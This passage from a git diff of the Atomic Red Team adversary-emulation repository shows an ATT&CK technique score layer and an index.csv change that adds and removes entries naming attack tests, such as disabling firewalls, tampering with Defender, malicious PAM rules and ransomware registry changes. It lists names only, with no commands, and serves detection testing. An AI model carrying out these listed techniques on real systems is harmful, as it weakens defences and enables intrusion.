Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":120,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 9aef64ae..99d8122b 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -13,6 +13,7 @@ defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution o
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
+defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,14,Running DLL with .init extension and function,2d5029f0-ae20-446f-8811-e7511b58e8b6,command_prompt
 defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
@@ -68,6 +69,7 @@ defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Cachi
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
+defense-evasion,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wpbbin.exe File Creation,b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
@@ -238,77 +240,79 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,19,
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
+defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt
 defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
-defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
-defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
-defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
-defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
-defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
-defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
-defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
-defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
-defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
-defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
-defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
-defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
-defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
-defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
-defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
-defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
-defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
-defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
-defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
-defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
-defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
-defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
-defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
-defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
-defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
-defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
-defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
-defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
-defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
-defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
-defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
-defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
-defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
-defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
-defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
-defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
-defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
-defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
-defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
-defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
-defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
-defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
-defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
-defense-evasion,T1112,Modify Registry,47,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
-defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
-defense-evasion,T1112,Modify Registry,49,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
-defense-evasion,T1112,Modify Registry,50,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
-defense-evasion,T1112,Modify Registry,51,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
-defense-evasion,T1112,Modify Registry,52,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
-defense-evasion,T1112,Modify Registry,53,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
-defense-evasion,T1112,Modify Registry,54,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
-defense-evasion,T1112,Modify Registry,55,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
-defense-evasion,T1112,Modify Registry,56,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
-defense-evasion,T1112,Modify Registry,57,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
-defense-evasion,T1112,Modify Registry,58,Modify Internet Zone Protocol Defaults in Current User Registry - cmd,c88ef166-50fa-40d5-a80c-e2b87d4180f7,command_prompt
-defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell,b1a4d687-ba52-4057-81ab-757c3dc0d3b5,powershell
-defense-evasion,T1112,Modify Registry,60,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
-defense-evasion,T1112,Modify Registry,61,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
